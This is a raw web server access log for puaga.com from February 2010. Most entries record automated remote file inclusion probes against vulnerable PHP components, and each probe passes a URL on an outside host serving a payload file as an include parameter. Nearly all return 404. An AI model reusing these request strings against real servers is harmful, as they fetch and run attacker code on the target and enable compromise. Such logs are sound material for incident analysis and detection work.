200.93.147.154 - - [20/Feb/2010:08:59:43 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:08:59:45 -0800] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:08:59:45 -0800] "GET /logs/access_100118.log/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:08:59:48 -0800] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:59:58 -0800] "GET /logs/access_100123.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:09:00:03 -0800] "GET /logs/access_100128.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:09:00:03 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:09:00:03 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:09:00:14 -0800] "GET /logs/access_100119.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:00:48 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:09:00:54 -0800] "GET /logs/access_100119.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:00:58 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.115 - - [20/Feb/2010:09:01:23 -0800] "GET /atesh_info/nt.php?t=4027971509 HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "www.atesh.info"
85.13.139.254 - - [20/Feb/2010:09:01:32 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:01:32 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:01:32 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:09:01:36 -0800] "GET /ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:01:44 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:01:44 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:01:44 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:09:01:55 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:09:01:55 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:02:05 -0800] "GET /logs/access_100207.log%20%20//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:02:05 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.195.162 - - [20/Feb/2010:09:02:05 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:02:11 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:02:11 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:02:11 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.146.200 - - [20/Feb/2010:09:02:22 -0800] "GET /logs/access_100210.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:02:28 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:02:28 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:02:28 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:02:39 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:02:41 -0800] "GET /errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:02:41 -0800] "GET /logs//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:02:41 -0800] "GET /logs/access_100204.log//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [20/Feb/2010:09:02:44 -0800] "GET /appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [20/Feb/2010:09:02:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [20/Feb/2010:09:02:44 -0800] "GET /logs/access_100122.log%20%20//appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:09:02:45 -0800] "GET /logs/access_100114.log%20%20/ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:02:59 -0800] "GET /logs//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:02:59 -0800] "GET /errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:03:00 -0800] "GET /logs/access_100204.log//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:09:03:12 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:09:03:12 -0800] "GET /logs/access_100119.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:09:03:12 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:09:03:34 -0800] "GET /logs/access_100210.log//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:04:16 -0800] "GET /logs/access_100208.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:04:22 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:25 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:25 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:25 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:35 -0800] "GET /logs//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:36 -0800] "GET /bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:04:36 -0800] "GET /logs/access_100121.log%20%20//bb_lib/checkdb.inc.php?libpach=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:04:38 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [20/Feb/2010:09:07:26 -0800] "GET /orange_g/forum/viewtopic.php?p=27660 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "puaga.com"
89.36.175.10 - - [20/Feb/2010:09:07:26 -0800] "GET /logs/access_100217.log//write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [20/Feb/2010:09:07:26 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [20/Feb/2010:09:07:26 -0800] "GET /write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [20/Feb/2010:09:07:31 -0800] "GET /logs/access_100210.log//write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:09:08:55 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://www.japanmagic.net/store/ECHO/idsatu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:09:08:55 -0800] "GET /ashnews.php?pathtoashnews=http://www.japanmagic.net/store/ECHO/idsatu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:09:08:56 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.japanmagic.net/store/ECHO/idsatu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:08:59 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:09:14 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:09:14 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:09:14 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:09:09:20 -0800] "GET /logs/access_100207.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [20/Feb/2010:09:09:35 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://www.japanmagic.net/store/ECHO/idsatu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:47 -0800] "GET /logs/access_100206.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:47 -0800] "GET /admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:47 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:55 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:55 -0800] "GET /logs/access_100206.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:09:59 -0800] "GET /admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:10:06 -0800] "GET /admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:10:06 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:10:06 -0800] "GET /logs/access_100206.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:10:27 -0800] "GET /logs/access_100115.log%20%20/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:10:27 -0800] "GET /logs/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [20/Feb/2010:09:10:44 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [20/Feb/2010:09:10:44 -0800] "GET /write_comment_update.php/?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:09:11:07 -0800] "GET /application.php?base_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:09:11:07 -0800] "GET /logs//application.php?base_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:09:11:07 -0800] "GET /logs/access_100111.log//application.php?base_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:11:55 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:11:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:11:55 -0800] "GET /logs/access_100114.log//modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:12:57 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:12:57 -0800] "GET /logs/access_100210.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:13:00 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:13:16 -0800] "GET /logs/access_100120.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:13:25 -0800] "GET /logs/access_100124.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:13:25 -0800] "GET /logs//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:13:25 -0800] "GET /default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:13:28 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:13:28 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:13:28 -0800] "GET /logs/access_100210.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:09:13:49 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:09:13:49 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:09:13:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:09:14:00 -0800] "GET /logs/access_100125.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:14:15 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:14:15 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:14:15 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:14:32 -0800] "GET /logs/access_100126.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:14:35 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:15:02 -0800] "GET /logs/access_100204.log%20%20//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:15:09 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:15:09 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:15:09 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [20/Feb/2010:09:15:23 -0800] "GET /logs/access_100122.log//appserv/main.php?appserv_root=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:15:30 -0800] "GET /logs/access_100126.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:16:15 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:16:15 -0800] "GET /logs/access_100114.log//modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:09:16:45 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
